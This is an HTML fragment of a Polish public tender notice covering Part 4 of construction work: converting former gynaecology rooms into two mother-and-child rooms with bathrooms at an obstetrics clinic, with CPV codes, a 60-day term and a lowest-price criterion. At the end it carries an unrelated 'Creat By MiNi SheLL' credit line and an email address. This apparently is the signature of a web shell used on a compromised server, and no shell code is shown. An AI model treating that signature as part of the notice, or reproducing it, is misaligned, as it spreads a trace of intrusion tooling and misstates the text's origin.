<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 4 - adaptacja pomieszczeń po Ginekologii na dwa pokoje Matki z dzieckiem z wydzieleniem łazienek w Klinice Położnictwa w obiekcie przy ul. Klinicznej 1a. Szczegółowy zakres robót objętych niniejszą częścią zamówienia zawarty jest w dokumentacji stanowiącej Załącznik nr 8 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.41.00.00-4, 45.43.22.10-9, 45.44.21.00-8, 45.45.00.00-6, 45.11.12.20-6, 45.26.23.21-7, 45.26.25.00-6, 45.32.10.00-3, 45.42.11.31-1, 45.42.11.32-8, 45.43.12.00-9, 32.41.30.00-1, 45.11.13.00-1, 45.26.23.21-7, 45.31.00.00-3, 45.33.00.00-9, 45.42.11.52-4, 45.43.11.00-8, 45.31.00.00-3, 45.32.00.00-6, 45.33.12.10-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com